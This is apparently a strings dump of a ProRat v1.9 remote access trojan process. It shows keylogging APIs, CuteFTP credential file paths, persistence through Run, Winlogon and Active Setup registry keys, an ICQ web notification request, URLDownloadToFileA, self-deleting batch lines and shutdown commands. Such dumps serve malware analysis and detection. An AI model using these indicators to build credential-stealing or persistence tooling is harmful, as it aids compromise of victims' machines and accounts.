@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat-Ftp-Server
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
KERNEL32.DLL
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL

services.exe_1716_rwx_00401000_001F5000:

Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServer4
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortP
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRsetp
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TCustomSmtpClientd
TSmtpCli
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
UhG%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.hPPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress|
OnKeyUp
windows
AutoHotkeys
AutoHotkeysT2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
dW%xSJ"
mfc42.dll
msvcrt.dll
.HookSec
B[ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey]
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
GetCPInfo
TESTDLL.dll
9'94999?9
CRTZFUKL,GZG
LTCPAJ34,GZG
151.164.23.201
151.164.1.8
212.101.97.7
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /wwp/msg/1,,,00.html?Uin=
&Name=ProRat&Send=yes HTTP/1.1
Host: web.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
web.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
<[email protected]>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
%WinDir%\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
